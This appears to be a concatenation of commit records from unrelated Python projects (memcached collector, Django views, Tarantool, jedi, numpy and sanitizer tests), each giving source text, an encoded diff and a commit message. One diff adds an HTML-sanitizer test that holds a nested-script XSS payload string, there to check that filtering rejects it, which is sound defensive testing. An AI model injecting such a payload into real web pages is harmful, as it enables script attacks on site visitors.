ignored = ('libevent', 'pointer_size', 'time', 'version',
'repcached_version', 'replication', 'accepting_conns',
'pid')
pid = None
stats = {}
data = self.get_raw_stats(host, port)
# parse stats
for line in data.splitlines():
pieces = line.split(' ')
if pieces[0] != 'STAT' or pieces[1] in ignored:
continue
elif pieces[1] == 'pid':
pid = pieces[2]
continue
if '.' in pieces[2]:
stats[pieces[1]] = float(pieces[2])
else:
stats[pieces[1]] = int(pieces[2])
# get max connection limit
self.log.debug('pid %s', pid)
try:
cmdline = "/proc/%s/cmdline" % pid
f = open(cmdline, 'r')
m = re.search("-c\x00(\d+)", f.readline())
if m is not None:
self.log.debug('limit connections %s', m.group(1))
stats['limit_maxconn'] = m.group(1)
f.close()
except:
self.log.debug("Cannot parse command line options for memcached")
return stats
def collect(self):
hosts = self.config.get('hosts')
# Convert a string config value to be an array
if isinstance(hosts, basestring):
hosts = [hosts]
for host in hosts:
matches = re.search('((.+)\@)?([^:]+)(:(\d+))?', host)
alias = matches.group(2)
hostname = matches.group(3)
port = matches.group(5)
if alias is None:
alias = hostname
stats = self.get_stats(hostname, port)
# figure out what we're configured to get, defaulting to everything
desired = self.config.get('publish', stats.keys())
# for everything we want
for stat in desired:
if stat in stats:
# we have it
if stat in self.GAUGES:
self.publish_gauge(alias + "." + stat, stats[stat])
else:
self.publish_counter(alias + "." + stat, stats[stat])
else:
# we don't, must be somehting configured in publish so we
# should log an error about it
self.log.error("No such key '%s' available, issue 'stats' "
"for a full list", stat)
|
Python
| 0
|
@@ -2286,16 +2286,105 @@
port)))%0A
+%0A # give up after a reasonable amount of time%0A sock.settimeout(3)%0A%0A
@@ -2436,16 +2436,17 @@
ats%5Cn')%0A
+%0A
@@ -2456,91 +2456,341 @@
# s
-omething big enough to get whatever is sent back%0A data = sock.recv(4096)
+tats can be sent across multiple packets, so make sure we've%0A # read up until the END marker%0A while True:%0A received = sock.recv(4096)%0A if not received:%0A break%0A data += received%0A if data.endswith('END%5Cr%5Cn'):%0A break
%0A
@@ -2923,16 +2923,37 @@
, port)%0A
+ sock.close()%0A
|
b2b19d5bd608db9286448000e1c998784139a614
|
update join
|
classmate_party/views.py
|
classmate_party/views.py
|
# -*- coding: utf-8 -*-
import os
import uuid
from PIL import Image
from django.shortcuts import render_to_response
from models import *
def index(request):
return render_to_response('index.html', locals())
def join(request):
msg = ''
category_choice = Person.CATEGORY_CHOICE
if request.method == 'POST':
categorys = request.POST.getlist('category')
name = request.POST.get('name')
phone_num = request.POST.get('phone_num')
pic = request.FILES.get('pic')
location1 = request.POST.get('location1', '')
location2 = request.POST.get('location2', '')
location = location1 + ' ' + location2
if not categorys:
msg = u'请勾选报名项目'
elif not name:
msg = u'请填写姓名'
elif not phone_num:
msg = u'请填写手机号'
else:
try:
im = Image.open(pic)
w, h = im.size
if h > 500:
r = h / 500.0
w = int(w / r)
h = int(h / r)
im = im.resize((w, h))
filename = "static/header/%s.png" % uuid.uuid4()
path = os.path.join(os.getcwd(), filename)
im.save(path)
pic_url = '/' + filename
for category in categorys:
person, created = Person.objects.get_or_create(category=category, name=name)
Person.objects.filter(name=name).update(
phone_num=phone_num,
pic_url=pic_url,
location=location
)
success = True
except:
msg = u'请上传一张您的近期照片'
return render_to_response('join.html', locals())
def list_persons(request):
rs = []
for category, category_display in Person.CATEGORY_CHOICE:
r = {}
r['category_display'] = category_display
r['persons'] = Person.objects.filter(category=category).order_by('update_time')
r['count'] = r['persons'].count
rs.append(r)
return render_to_response('list_persons.html', locals())
|
Python
| 0
|
@@ -1289,16 +1289,52 @@
lename%0A%0A
+ modify_persons = %5B%5D%0A
@@ -1464,16 +1464,66 @@
me=name)
+%0A modify_persons.append(person)
%0A%0A
@@ -1532,16 +1532,30 @@
+for person in
Person.o
@@ -1582,16 +1582,275 @@
ame)
-.update(
+:%0A update_fields = %5B'phone_num', 'pic_url', 'location'%5D%0A if person in modify_persons:%0A update_fields.append('update_time')%0A person.phone_num = ''%0A person.save()
%0A
@@ -1858,32 +1858,39 @@
+person.
phone_num=phone_
@@ -1882,17 +1882,19 @@
hone_num
-=
+ =
phone_nu
@@ -1894,17 +1894,16 @@
hone_num
-,
%0A
@@ -1919,24 +1919,32 @@
+person.
pic_url
-=
+ =
pic_url
-,
%0A
@@ -1960,24 +1960,31 @@
+person.
location
=locatio
@@ -1975,17 +1975,19 @@
location
-=
+ =
location
@@ -2003,16 +2003,59 @@
+ person.save(update_fields=update_fields
)%0A%0A
|
5e991fd00d980884f9210cfd5f25d5e7d91aabfc
|
Fix race condition in #144
|
test/replication/init_storage.test.py
|
test/replication/init_storage.test.py
|
import os
import glob
from lib.tarantool_server import TarantoolServer
# master server
master = server
master.admin('space = box.schema.create_space(\'test\', {id = 42})')
master.admin('space:create_index(\'primary\', \'hash\', {parts = { 0, \'num\' } })')
master.admin('for k = 1, 9 do space:insert(k, k*k) end')
for k in glob.glob(os.path.join(master.vardir, '*.xlog')):
os.unlink(k)
print '-------------------------------------------------------------'
print 'replica test 1 (must be failed)'
print '-------------------------------------------------------------'
replica = TarantoolServer()
replica.deploy("replication/cfg/replica.cfg",
replica.find_exe(self.args.builddir),
os.path.join(self.args.vardir, "replica"),
need_init=False)
for i in range(1, 10):
replica.admin('box.select(42, 0, %d)' % i)
replica.stop()
replica.cleanup(True)
master.admin('box.snapshot()')
master.restart()
master.admin('for k = 10, 19 do box.insert(42, k, k*k*k) end')
print '-------------------------------------------------------------'
print 'replica test 2 (must be ok)'
print '-------------------------------------------------------------'
replica = TarantoolServer()
replica.deploy("replication/cfg/replica.cfg",
replica.find_exe(self.args.builddir),
os.path.join(self.args.vardir, "replica"),
need_init=False)
replica.admin('space = box.space.test');
for i in range(1, 20):
replica.admin('space:select(0, %d)' % i)
replica.stop()
replica.cleanup(True)
server.stop()
server.deploy(self.suite_ini["config"])
|
Python
| 0
|
@@ -371,17 +371,20 @@
log')):%0A
-%09
+
os.unlin
@@ -807,25 +807,28 @@
nge(1, 10):%0A
-%09
+
replica.admi
@@ -1008,17 +1008,46 @@
) end')%0A
+lsn = master.get_param('lsn')
%0A
-
print '-
@@ -1474,17 +1474,38 @@
test');%0A
+replica.wait_lsn(lsn)
%0A
-
for i in
@@ -1523,9 +1523,12 @@
0):%0A
-%09
+
repl
|
69364c598f380a15cc5b03cb935bed0f2085bac1
|
fix abroken test
|
test/test_api/test_call_signatures.py
|
test/test_api/test_call_signatures.py
|
from textwrap import dedent
import inspect
from ..helpers import TestCase
from jedi import Script
from jedi._compatibility import is_py33
class TestCallSignatures(TestCase):
def _run(self, source, expected_name, expected_index=0, line=None, column=None):
signatures = Script(source, line, column).call_signatures()
assert len(signatures) <= 1
if not signatures:
assert expected_name is None
else:
assert signatures[0].name == expected_name
assert signatures[0].index == expected_index
def _run_simple(self, source, name, index=0, column=None, line=1):
self._run(source, name, index, line, column)
def test_simple(self):
run = self._run_simple
# simple
s1 = "abs(a, str("
run(s1, 'abs', 0, 4)
run(s1, 'abs', 1, 6)
run(s1, 'abs', 1, 7)
run(s1, 'abs', 1, 8)
run(s1, 'str', 0, 11)
s2 = "abs(), "
run(s2, 'abs', 0, 4)
run(s2, None, column=5)
run(s2, None)
s3 = "abs()."
run(s3, None, column=5)
run(s3, None)
# more complicated
s4 = 'abs(zip(), , set,'
run(s4, None, column=3)
run(s4, 'abs', 0, 4)
run(s4, 'zip', 0, 8)
run(s4, 'abs', 0, 9)
#run(s4, 'abs', 1, 10)
s5 = "abs(1,\nif 2:\n def a():"
run(s5, 'abs', 0, 4)
run(s5, 'abs', 1, 6)
s6 = "str().center("
run(s6, 'center', 0)
run(s6, 'str', 0, 4)
s7 = "str().upper().center("
s8 = "str(int[zip("
run(s7, 'center', 0)
run(s8, 'zip', 0)
run(s8, 'str', 0, 8)
run("import time; abc = time; abc.sleep(", 'sleep', 0)
# jedi #57
s = "def func(alpha, beta): pass\n" \
"func(alpha='101',"
run(s, 'func', 0, column=13, line=2)
def test_flows(self):
# jedi-vim #9
self._run_simple("with open(", 'open', 0)
# jedi-vim #11
self._run_simple("for sorted(", 'sorted', 0)
self._run_simple("for s in sorted(", 'sorted', 0)
def test_complex(self):
s = """
def abc(a,b):
pass
def a(self):
abc(
if 1:
pass
"""
self._run(s, 'abc', 0, line=6, column=24)
s = """
import re
def huhu(it):
re.compile(
return it * 2
"""
self._run(s, 'compile', 0, line=4, column=31)
# jedi-vim #70
s = """def foo("""
assert Script(s).call_signatures() == []
# jedi-vim #116
s = """import itertools; test = getattr(itertools, 'chain'); test("""
self._run(s, 'chain', 0)
def test_call_signature_on_module(self):
"""github issue #240"""
s = 'import datetime; datetime('
# just don't throw an exception (if numpy doesn't exist, just ignore it)
assert Script(s).call_signatures() == []
def test_call_signatures_empty_parentheses_pre_space(self):
s = dedent("""\
def f(a, b):
pass
f( )""")
self._run(s, 'f', 0, line=3, column=3)
def test_multiple_signatures(self):
s = dedent("""\
if x:
def f(a, b):
pass
else:
def f(a, b):
pass
f(""")
assert len(Script(s).call_signatures()) == 2
def test_call_signatures_whitespace(self):
s = dedent("""\
abs(
def x():
pass
""")
self._run(s, 'abs', 0, line=1, column=5)
def test_decorator_in_class(self):
"""
There's still an implicit param, with a decorator.
Github issue #319.
"""
s = dedent("""\
def static(func):
def wrapped(obj, *args):
return f(type(obj), *args)
return wrapped
class C(object):
@static
def test(cls):
return 10
C().test(""")
signatures = Script(s).call_signatures()
assert len(signatures) == 1
x = [p.description for p in signatures[0].params]
assert x == ['*args']
class TestParams(TestCase):
def params(self, source, line=None, column=None):
signatures = Script(source, line, column).call_signatures()
assert len(signatures) == 1
return signatures[0].params
def test_param_name(self):
if not is_py33:
p = self.params('''int(''')
# int is defined as: `int(x[, base])`
assert p[0].name == 'x'
assert p[1].name == 'base'
p = self.params('''open(something,''')
assert p[0].name in ['file', 'name']
assert p[1].name == 'mode'
def test_signature_is_definition():
"""
Through inheritance, a call signature is a sub class of Definition.
Check if the attributes match.
"""
s = """class Spam(): pass\nSpam"""
signature = Script(s + '(').call_signatures()[0]
definition = Script(s + '(').goto_definitions()[0]
signature.line == 1
signature.column == 6
# Now compare all the attributes that a CallSignature must also have.
for attr_name in dir(definition):
dont_scan = ['defined_names', 'line_nr', 'start_pos', 'documentation', 'doc']
if attr_name.startswith('_') or attr_name in dont_scan:
continue
attribute = getattr(definition, attr_name)
signature_attribute = getattr(signature, attr_name)
if inspect.ismethod(attribute):
assert attribute() == signature_attribute()
else:
assert attribute == signature_attribute
def test_no_signature():
# str doesn't have a __call__ method
assert Script('str()(').call_signatures() == []
s = dedent("""\
class X():
pass
X()(""")
assert Script(s).call_signatures() == []
assert len(Script(s, column=2).call_signatures()) == 1
|
Python
| 0.000508
|
@@ -5416,21 +5416,52 @@
tation',
- 'doc
+%0A 'doc', 'parent
'%5D%0A
|
0ea32a2b51438b55130082e54f30fc9c97bd9d85
|
Fix compatibility with oslo.db 12.1.0
|
cloudkitty/db/__init__.py
|
cloudkitty/db/__init__.py
|
# -*- coding: utf-8 -*-
# Copyright 2014 Objectif Libre
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
from oslo_config import cfg
from oslo_db.sqlalchemy import session
_FACADE = None
def _create_facade_lazily():
global _FACADE
if _FACADE is None:
_FACADE = session.EngineFacade.from_config(cfg.CONF, sqlite_fk=True)
return _FACADE
def get_engine():
facade = _create_facade_lazily()
return facade.get_engine()
def get_session(**kwargs):
facade = _create_facade_lazily()
return facade.get_session(**kwargs)
|
Python
| 0.000019
|
@@ -794,70 +794,299 @@
-_FACADE = session.EngineFacade.from_config(cfg.CONF, sqlite_fk
+# FIXME(priteau): Remove autocommit=True (and ideally use of%0A # LegacyEngineFacade) asap since it's not compatible with SQLAlchemy%0A # 2.0.%0A _FACADE = session.EngineFacade.from_config(cfg.CONF, sqlite_fk=True,%0A autocommit
=Tru
|
cfe7de10ef9c6c1d8d5be71993e5f96ace58953d
|
Update Ansible release version to 2.6.0dev0.
|
lib/ansible/release.py
|
lib/ansible/release.py
|
# (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
__version__ = '2.6.0a1'
__author__ = 'Ansible, Inc.'
__codename__ = 'Heartbreaker'
|
Python
| 0
|
@@ -851,10 +851,12 @@
.6.0
-a1
+dev0
'%0A__
|
359f337d7cfd0dac2eec8ecce643af10588e3e6a
|
Fix i18n __radd__ bug
|
uliweb/i18n/lazystr.py
|
uliweb/i18n/lazystr.py
|
def lazy(func):
def f(message):
return LazyString(func, message)
return f
class LazyString(object):
"""
>>> from uliweb.i18n import gettext_lazy as _
>>> x = _('Hello')
>>> print repr(x)
"""
def __init__(self, func, message):
self._func = func
self.msg = message
self._format = []
def __unicode__(self):
if not self.msg:
return ''
value = self.getvalue()
if isinstance(value, unicode):
return value
else:
return unicode(self.getvalue(), 'utf-8')
def __str__(self):
if not self.msg:
return ''
value = self.getvalue()
if isinstance(value, unicode):
return value.encode('utf-8')
else:
return str(value)
def format(self, *args, **kwargs):
self._format.append((args, kwargs))
return self
def getvalue(self):
v = self._func(self.msg)
for args, kwargs in self._format:
v = v.format(*args, **kwargs)
return v
def __repr__(self):
return "%s_lazy(%r)" % (self._func.__name__, self.msg)
def __add__(self, obj):
return self.getvalue() + obj
def __radd__(self, obj):
return self.getvalue() + obj
def encode(self, encoding):
return self.getvalue().encode(encoding)
def split(self, *args, **kwargs):
return self.getvalue().split(*args, **kwargs)
# def __getattr__(self, name):
# return getattr(self.getvalue(), name)
|
Python
| 0.263457
|
@@ -1356,32 +1356,38 @@
%0D%0A return
+ obj +
self.getvalue()
@@ -1378,38 +1378,32 @@
self.getvalue()
- + obj
%0D%0A %0D%0A
|
ac985005f925c0d37ae337ada0bf88b50becaee6
|
change scheduler
|
coalics/schedule.py
|
coalics/schedule.py
|
import os.path
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), ".."))
import logging
from coalics import tasks, q, redis, app
from datetime import datetime
from datetime import datetime, timedelta
import time
# stream_handler = logging.StreamHandler()
# stream_handler.setLevel(logging.INFO)
# app.logger.addHandler(stream_handler)
logger = logging.getLogger("Scheduler")
fh = logging.FileHandler("/app/log/scheduler.log")
fh.setLevel(logging.INFO)
logger.setLevel(logging.INFO)
formatter = logging.Formatter("%(asctime)s %(levelname)s %(message)s")
fh.setFormatter(formatter)
logger.addHandler(fh)
prev_job = None
td = timedelta(seconds=app.config["SOURCE_UPDATE_FREQUENCY"])
logger.info("Scheduler launching")
while True:
try:
logger.info("Begin schedule run")
if prev_job: print(prev_job.result)
if prev_job == None or prev_job.result != None:
prev_job = q.enqueue(tasks.update_sources, timeout=td.seconds*0.9)
logger.info("Scheduler: ran without error")
except Exception as e:
logger.error("Scheduler: caught error {}".format(str(e)))
finally:
logger.info("Scheduler: Sleeping for {}s".format(td.seconds))
time.sleep(td.seconds)
|
Python
| 0.000001
|
@@ -805,123 +805,8 @@
- if prev_job: print(prev_job.result)%0A if prev_job == None or prev_job.result != None:%0A prev_job =
q.e
|
bcf244e19c20fafcc89658d4aac8859097deb18c
|
Add ValidationDecoratorTest class
|
test/test_validation.py
|
test/test_validation.py
|
# -*- coding: utf-8 -*-
import unittest
from mock import Mock, patch
from cachetools.func import lru_cache
from nose_parameterized import parameterized
from spam_lists.validation import accepts_valid_urls, is_valid_url
from spam_lists.exceptions import InvalidURLError
class AcceptValidUrlsTest(unittest.TestCase):
def setUp(self):
self.is_valid_url_patcher = patch('spam_lists.validation.is_valid_url')
self.is_valid_url_mock = self.is_valid_url_patcher.start()
function = Mock()
function.__name__ = 'function'
self.client = Mock()
self.function = function
self.decorated_function = accepts_valid_urls(self.function)
def tearDown(self):
self.is_valid_url_patcher.stop()
@parameterized.expand([
('hostname', 'https://valid.com'),
('ipv4_host', 'http://122.34.59.109'),
('ipv6_host', 'http://[2001:db8:abc:123::42]')
])
def test_accept_valid_urls_for_valid(self, _, url):
self.decorated_function(self.client, url)
self.function.assert_called_once_with(self.client, url)
@parameterized.expand([
('invalid_hostname', 'http://-abc.com'),
('invalid_schema', 'abc://hostname.com'),
('no_schema', 'hostname.com'),
('invalid_ipv4', 'http://999.999.999.999'),
('invalid_ipv4', 'http://127.0.0.0.1'),
('invalid_ipv6', 'http://[2001:db8:abcef:123::42]'),
('invalid_ipv6', 'http://[2001:db8:abch:123::42]')
])
def test_accept_valid_urls_for(self, _, url):
self.is_valid_url_mock.return_value = False
self.assertRaises(InvalidURLError, self.decorated_function, self.client, url)
self.function.assert_not_called()
@lru_cache()
def get_url_tester_mock(identifier):
source = Mock()
source.identifier = identifier
return source
class IsValidUrlTest(unittest.TestCase):
@parameterized.expand([
('http_scheme', 'http://test.url.com'),
('https_scheme', 'https://google.com'),
('ftp_scheme', 'ftp://ftp.test.com'),
('numeric_hostname', 'http://999.com'),
('final_slash', 'https://google.com/'),
('path_query_and_fragment', 'https://test.domain.com/path/element?var=1&var_2=3#fragment'),
('query', 'http://test.domain.com?var_1=1&var_2=2'),
('path', 'http://test.domain.com/path'),
('path_and_fragment', 'http://test.domain.com/path#fragment'),
('query_and_fragment', 'http://test.domain.com?var_1=1&var_2=2#fragment'),
('port', 'https://test.domain.com:123'),
('authentication', 'https://abc:def@test.domain.com'),
('ipv4', 'http://255.0.0.255'),
('ipv6', 'http://[2001:db8:abc:125::45]')
])
def test_is_valid_url_for_url_with(self, _, url):
self.assertTrue(is_valid_url(url))
@parameterized.expand([
('no_schema', 'test.url.com'),
('invalid_ipv4', 'http://266.0.0.266'),
('invalid_ipv6', 'http://127.0.0.1.1'),
('invalid_port', 'http://test.domain.com:aaa'),
('no_top_level_domain', 'https://testdomaincom'),
('invalid_hostname', 'http://-invalid.domain.com')
])
def test_is_valid_url_for_invalid_url_with(self, _, url):
self.assertFalse(is_valid_url(url))
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main()
|
Python
| 0
|
@@ -4010,16 +4010,920 @@
rl(url))
+%0A %0Aclass ValidationDecoratorTest(object):%0A %0A def setUp(self):%0A self.validity_tester_patcher = patch(self.validity_tester)%0A self.validity_tester_mock = self.validity_tester_patcher.start()%0A %0A function = Mock()%0A function.__name__ = 'function'%0A %0A self.obj = Mock()%0A self.function = function%0A self.decorated_function = self.decorator(self.function)%0A %0A def tearDown(self):%0A self.validity_tester_patcher.stop()%0A %0A def _test_wrapper_for_valid(self, value):%0A self.decorated_function(self.obj, value)%0A self.function.assert_called_once_with(self.obj, value)%0A %0A def _test_wrapper_for_invalid(self, value):%0A self.validity_tester_mock.return_value = False%0A %0A self.assertRaises(self.exception_type, self.decorated_function, self.obj, value)%0A self.function.assert_not_called()
%0A%0Aif __n
|
9b354f4dc00e3aef4cfceae71be60b1dc60a1927
|
Add test for ticket #1559.
|
numpy/ma/tests/test_regression.py
|
numpy/ma/tests/test_regression.py
|
from numpy.testing import *
import numpy as np
rlevel = 1
class TestRegression(TestCase):
def test_masked_array_create(self,level=rlevel):
"""Ticket #17"""
x = np.ma.masked_array([0,1,2,3,0,4,5,6],mask=[0,0,0,1,1,1,0,0])
assert_array_equal(np.ma.nonzero(x),[[1,2,6,7]])
def test_masked_array(self,level=rlevel):
"""Ticket #61"""
x = np.ma.array(1,mask=[1])
def test_mem_masked_where(self,level=rlevel):
"""Ticket #62"""
from numpy.ma import masked_where, MaskType
a = np.zeros((1,1))
b = np.zeros(a.shape, MaskType)
c = masked_where(b,a)
a-c
def test_masked_array_multiply(self,level=rlevel):
"""Ticket #254"""
a = np.ma.zeros((4,1))
a[2,0] = np.ma.masked
b = np.zeros((4,2))
a*b
b*a
def test_masked_array_repeat(self, level=rlevel):
"""Ticket #271"""
np.ma.array([1],mask=False).repeat(10)
def test_masked_array_repr_unicode(self):
"""Ticket #1256"""
repr(np.ma.array(u"Unicode"))
|
Python
| 0
|
@@ -1075,8 +1075,290 @@
ode%22))%0A%0A
+ def test_atleast_2d(self):%0A %22%22%22Ticket #1559%22%22%22%0A a = np.ma.masked_array(%5B0.0, 1.2, 3.5%5D, mask=%5BFalse, True, False%5D)%0A b = np.atleast_2d(a)%0A assert_(a.mask.ndim == 1)%0A assert_(b.mask.ndim == 2)%0A%0A%0Aif __name__ == %22__main__%22:%0A run_module_suite()%0A
|
813c478f06c175e36dc8334fd37195e403a42166
|
update test_symbol_accuracy
|
test_symbol_accuracy.py
|
test_symbol_accuracy.py
|
from dataset import create_testing_data_for_symbol, get_symbol_list
from keras.models import load_model
import sys
INITIAL_CAPITAL = 10000.0
PERCENT_OF_CAPITAL_PER_TRANSACTION = 10.0
TRANSACTION_FEE = 0
def compare(x, y):
if x[1] < y[1]:
return 1
return -1
def main():
model = load_model(sys.argv[1])
symbols = get_symbol_list()
gains = []
for sym in symbols:
X, Y = create_testing_data_for_symbol(sym)
print "----"
money = INITIAL_CAPITAL
for i in range(len(X)):
current = X[i]
current_value = current[0][-1]
prediction = model.predict(X[i:i+1])
if prediction[0][0] > current_value * 1.02:
investment = 100.0
money -= investment + TRANSACTION_FEE * 2.0
revenue = Y[i:i+1][0][0] / current_value * investment
gain = revenue - investment
money += revenue
print ""
print "symbol:", sym
total_gain = money - INITIAL_CAPITAL
percent_gain = ((money / INITIAL_CAPITAL) - 1.0) * 100.0
print "gain:", total_gain, "(", percent_gain, ")"
gains.append([sym, total_gain, percent_gain])
gains.sort(compare)
for item in gains:
print item
if __name__ == "__main__":
main()
|
Python
| 0.000025
|
@@ -227,16 +227,16 @@
f x%5B
-1
+3
%5D %3C y%5B
-1
+3
%5D:%0A%09
@@ -364,16 +364,31 @@
ymbols:%0A
+%09%09print %22----%22%0A
%09%09X, Y =
@@ -423,31 +423,16 @@
bol(sym)
-%0A%09%09print %22----%22
%0A%0A%09%09mone
@@ -451,16 +451,47 @@
CAPITAL%0A
+%09%09true_pos = 0%0A%09%09false_pos = 0%0A
%09%09for i
@@ -645,17 +645,17 @@
ue * 1.0
-2
+1
:%0A%09%09%09%09in
@@ -831,16 +831,84 @@
revenue%0A
+%09%09%09%09if gain %3E 0.0:%0A%09%09%09%09%09true_pos += 1%0A%09%09%09%09else:%0A%09%09%09%09%09false_pos += 1%0A
%09%09print
@@ -1087,28 +1087,226 @@
%22)%22%0A
-%0A%09%09gains.append(%5Bsym
+%09%09accuracy = 0 if false_pos+true_pos == 0 else float(true_pos)/float(false_pos+true_pos)%0A%09%09print %22true pos:%22, true_pos, %22false pos:%22, false_pos, %22accuracy:%22, accuracy%0A%0A%09%09gains.append(%5Bsym, true_pos, false_pos, accuracy
, to
@@ -1413,15 +1413,102 @@
ain__%22:%0A
+%09# import dataset%0A%0A%09# X, y = dataset.create_testing_data_for_symbol('CBI')%0A%0A%09# print X%0A
%09main()
|
43d30fd28bd09708c1ad0dd64b702a61d9a25636
|
add test for XSS attack
|
tests/app/soc/logic/test_filtering.py
|
tests/app/soc/logic/test_filtering.py
|
#!/usr/bin/env python2.5
# -*- coding: UTF-8 -*-
#
# Copyright 2010 the Melange authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__authors__ = [
'"Matthew Wilkes" <matthew@matthewwilkes.co.uk>',
]
import unittest
from htmlsanitizer import HtmlSanitizer
class FilteringTest(unittest.TestCase):
"""Tests to check HTML filtering works correctly.
"""
def test_newlines_preserved_unchanged_normally(self):
""" Test that newline is preserved in paragraphs. """
dirty = u'''<p>\r\n</p>'''
expected = u'''<p>\n</p>'''
cleaner = HtmlSanitizer.Cleaner()
cleaner.string = dirty
cleaner.clean()
self.assertEqual(cleaner.string, expected)
def test_newlines_preserved_if_needed_to_be_wrapped(self):
""" Test that when wrapped in <p /> tags newlines are preserved
(albeit normalised)."""
dirty = u'''\n\n'''
expected = u'''<p>\n</p>'''
cleaner = HtmlSanitizer.Cleaner()
cleaner.string = dirty
cleaner.clean()
self.assertEqual(cleaner.string, expected)
def test_newlines_wrapped_together_if_in_filtered_tags(self):
""" Test that when tags are filtered their contents is preserved (albeit
with normalised whitespace). """
dirty = u'''<div>\n</div><div>\n</div>'''
expected = u'''<p>\n</p>'''
cleaner = HtmlSanitizer.Cleaner()
cleaner.string = dirty
cleaner.clean()
self.assertEqual(cleaner.string, expected)
def test_elements_that_compare_equal_arent_reordered(self):
""" Test that ordering is preserved with multiple identical tags.
If two elements have the same contents they compare equal. You can
abuse the insert method in beautiful soup to reorder tags, as if a
subelement is reinserted it will be moved to the position passed to
insert. Unfortunately, this gets confused if elements compare equal,
which results in only the first one being moved and all others left in
place. If all elements are 'moved' then this has the effect of the
other equal tags being left at the end of the stream.
"""
dirty = u'''<div>\n<h1>One</h1>\n<div>\n<h2>Repeat</h2>\n</div>\n</div>\n<div>\n<h1>Two</h1>\n<div>\n<h2>Repeat</h2>\n</div>\n</div>'''
expected = u'''\n<h1>One</h1>\n<h2>Repeat</h2>\n<h1>Two</h1>\n<h2>Repeat</h2>\n'''
cleaner = HtmlSanitizer.Cleaner()
cleaner.string = dirty
cleaner.clean()
self.assertEqual(cleaner.string, expected)
def test_break_tags_are_preserved(self):
""" Test that <br /> tags are preserved when wrapped. """
dirty = u'''Hello.<br />Goodbye.'''
expected = u'''<p>Hello.<br />Goodbye.</p>'''
cleaner = HtmlSanitizer.Cleaner()
cleaner.string = dirty
cleaner.clean()
self.assertEqual(cleaner.string, expected)
def test_no_extra_paragraphs_are_inserted(self):
"""Test that no extra paragraph tags are incerted"""
dirty = u'''<p>Bob</p>\n<p>Hello Bob</p>'''
cleaner = HtmlSanitizer.Cleaner()
cleaner.string = dirty
cleaner.clean()
self.assertEqual(dirty, cleaner.string)
|
Python
| 0
|
@@ -3514,8 +3514,557 @@
string)%0A
+%0A def test_xss_gets_filtered(self):%0A %22%22%22Test that the XSS as described in %5B0%5D gets filtered.%0A%0A %5B0%5D http://stackoverflow.com/questions/699468/python-html-sanitizer-scrubber-filter/812785#812785%0A %22%22%22%0A from HTMLParser import HTMLParseError%0A%0A dirty = u'''%3C%3Cscript%3Escript%3E alert(%22Haha, I hacked your page.%22); %3C/%3C/script%3Escript%3E'''%0A cleaner = HtmlSanitizer.Cleaner()%0A try:%0A cleaner.string = dirty%0A cleaner.clean()%0A self.fail(%22Invalid html should generate an error message.%22)%0A except HTMLParseError, msg:%0A pass%0A
|
cf4fc126b49c425d7f441abc91f4114b5f1303ea
|
Move publication field above tite//subtitle/description in admin
|
cms_lab_carousel/admin.py
|
cms_lab_carousel/admin.py
|
from django.contrib import admin
from cms_lab_carousel.models import Carousel, Slide
class CarouselAdmin(admin.ModelAdmin):
fieldset_frame = ('Carousel Frame', {
'fields': [
'title',
'header_image',
'footer_image',
],
})
fieldset_visibility = ('Visibility', {
'fields': [
'show_title',
'show_header',
'show_footer',
],
'classes': ['collapse'],
})
fieldset_slides = ('Slide Settings', {
'fields': [
'slider_height',
'slider_duration',
'slide_limit',
],
'classes': ['collapse'],
})
fieldsets = [
fieldset_frame,
fieldset_visibility,
fieldset_slides,
]
search_fields = ['title']
admin.site.register(Carousel, CarouselAdmin)
class CarouselFilter(admin.SimpleListFilter):
title = 'Carousel'
parameter_name = 'carousel'
def lookups(self, request, model_admin):
carousel_list = set([slide.carousel for slide in model_admin.model.objects.all()])
return [(carousel.id, carousel.title) for carousel in carousel_list]
def queryset(self, request, queryset):
if self.value():
return queryset.filter(carousel__id__exact=self.value())
else:
return queryset
class SlideAdmin(admin.ModelAdmin):
fieldset_basic = ('Basic Slide Info', {
'fields': [
'carousel',
'title',
'subtitle',
'description',
'image',
'image_is_downloadable',
],
})
fieldset_article = ('Scientific Article Info', {
'fields': [
'publication',
'pdf',
'pubmed_url',
'article_url',
'journal_name',
],
})
fieldset_page_link = ('Page Link', {
'fields': [
'page_link',
'page_link_label',
'page_link_color',
'page_link_anchor',
'page_link_target',
],
'classes': ['collapse'],
})
fieldset_other_url = ('Other URL', {
'fields': [
'other_url',
'other_url_label',
'other_url_color',
],
'classes': ['collapse'],
})
fieldset_publish = ('Publish Settings', {
'fields': [
'publish_slide',
'publish_datetime',
],
})
fieldsets = [
fieldset_basic,
fieldset_article,
fieldset_page_link,
fieldset_other_url,
fieldset_publish,
]
list_display = ['title', 'carousel', 'publish_slide', 'publish_datetime' ]
list_filter = [CarouselFilter, 'publish_slide', 'journal_name']
search_fields = ['title', 'subtitle', 'description']
admin.site.register(Slide, SlideAdmin)
admin.site.site_header = 'CMS Lab Carousel Administration'
|
Python
| 0
|
@@ -1472,24 +1472,51 @@
'carousel',%0A
+ 'publication',%0A
@@ -1729,35 +1729,8 @@
: %5B%0A
- 'publication',%0A
|
46c490df9a3e60119de5485fb508e527e6dbb057
|
